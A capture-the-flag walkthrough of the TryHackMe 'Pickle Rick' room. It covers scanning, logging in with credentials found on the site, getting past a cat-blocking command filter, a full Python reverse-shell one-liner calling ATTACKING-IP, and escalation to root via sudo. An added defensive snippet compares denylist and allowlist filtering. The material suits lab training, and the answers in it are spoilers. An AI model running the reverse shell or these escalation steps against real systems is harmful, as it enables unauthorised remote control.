Pickle Rick - THM

Recon:

Fallen sky
InfoSec Write-ups


Let’s start by running an nmap scan against the given machine to see which ports are open.

Navigating to port 80 and looking at the page source, we get the username: R1ckRul3s.

On running gobuster, we can see that we have a directory named assets. Let’s go there.

Let’s also go to /robots.txt and see what we can find:

Wubbalubbadubdub. xD

Gobuster results:

Let’s try to log in with the username, using the string we got as the password.

We are met with a panel where we can execute commands, and ‘cat’ doesn’t work!

So let’s just trick this and use tac instead.

Using tac on clue.txt gives the output:

Look around the file system for the other ingredient.
tac Sup3rS3cretPickl3Ingred.txt

Running this will give you the first ingredient as output.
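Why swapping cat for tac works, shown from the defender's side as an added example (not code from the room or from this write-up): a command panel that only refuses known-bad words lets every other program through, while an allowlist of fixed actions does not. The filter logic, the action names and the readable-file set are assumptions made up for illustration.

```python
import shlex

# Assumption: the panel rejects input that mentions a blocked word. This is a
# hypothetical reconstruction; the page only tells us that 'cat' is refused.
DENYLIST = {"cat"}

def denylist_allows(command: str) -> bool:
    """Weak filter: accept anything that does not contain a blocked word."""
    return not any(word in command for word in DENYLIST)

# Hardened form: the user picks a named action, the server owns the argv.
# Action names and the file set below are constructed example values.
ALLOWED_ACTIONS = {"list": ["ls", "-l"], "show": ["cat", "--"]}
READABLE_FILES = {"clue.txt"}

def allowlist_argv(command: str):
    """Return the argv the server would run, or None if the request is rejected."""
    try:
        parts = shlex.split(command)
    except ValueError:              # unbalanced quotes and similar input
        return None
    if not parts or parts[0] not in ALLOWED_ACTIONS:
        return None
    args = parts[1:]
    if parts[0] == "show":
        # Exactly one argument, and it must be a file we chose to expose.
        if len(args) != 1 or args[0] not in READABLE_FILES:
            return None
    elif args:
        return None                 # 'list' takes no arguments
    # The result is a list for subprocess.run(argv) without shell=True.
    return ALLOWED_ACTIONS[parts[0]] + args

if __name__ == "__main__":
    # Constructed requests, taken from the commands used in this write-up.
    for request in ["cat clue.txt", "tac clue.txt",
                    "tac Sup3rS3cretPickl3Ingred.txt",
                    "show clue.txt", "show Sup3rS3cretPickl3Ingred.txt"]:
        print(f"{request!r:40} denylist={denylist_allows(request)!s:5} "
              f"allowlist={allowlist_argv(request)}")
```
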

Now, let’s get a reverse shell on the system using a python3 one-liner:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

There we go, we have the reverse shell.

Make the shell interactive using:

/bin/bash -ki

Get the linpeas.sh file onto the machine through this shell and run it; you’ll see that sudo can run any command or tool without a password. Alternatively, run sudo -l to see the permissions.

Run:

sudo bash

to get root access, and voilà. Search for the second and third ingredients by navigating to the user home directories.

John Hammond has a really cool project which makes it easier to transfer files from your system to the machine, without you having to set up netcat and stuff. Check it out: https://github.com/JohnHammond/poor-mans-pentest/blob/master/upload_file_nc.sh

Keep hackin!
